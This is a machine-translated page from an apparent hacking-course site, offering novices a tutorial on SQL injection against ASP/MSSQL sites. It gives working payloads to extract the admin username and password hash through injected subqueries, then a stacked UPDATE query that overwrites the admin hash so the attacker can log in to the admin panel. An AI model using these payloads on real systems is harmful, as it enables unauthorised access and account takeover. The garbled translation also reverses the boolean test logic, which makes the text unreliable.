You are here: hacking technology > hacker course > Content
Hot Articles
Recommend Articles
New Articles
The SQL injection revises difficultly to guess the solution MD5
  Add date: 07/08/2008   Publishing date: 07/08/2008   Hits: 94

Online explains MD5 in the website to look up. But some MD5 password very leaning, therefore some novices will give up. I for the novice introduced that one kind very simple can revise difficultly to guess solves the MD5 password the method.

  Often invades the master has neglected.

  Looks for an address casually

  http://www.xxx.org/news.asp?id=121

  After the address inputs the single quotes, the demonstration

  Microsoft OLE DB Provider for SQL Server is wrong '80040e14'

  Before string of character ''', does not have the closed quotation mark

  /news/wantpws.asp, line 63

  Showing has not filtered the single quotes and the database is MSSQL.

  and 1=1 makes a mistake. and 1=2 is normal.

  Then input

  http://www.xxx.org/news.asp?id=1 or admin_user in (select id from admin)

  Obtains the account number is: admin

  http://www.xxx.org/news.asp?id=121 or admin_password in (select id from admin)

  Obtains the password is: a4716077c2ba075c

  Then we might change the password. But we formerly must know we encrypt character: e8dc763194f29433

  Typing:

  ; update shop_admin set password='e8dc763194f29433' where password='a4716077c2ba075c'--

  This meaning is replaces a4716077c2ba075c with e8dc763194f29433, achieves the revision password the goal.

  Sweeps the backstage is

  http://www.xxx.org/admin/admin_login.asp


Prev:How does the hacker destroy kills the poisonous software Next:The new military recruits take WebShell the experience

Comment:

Category: Home > hacker course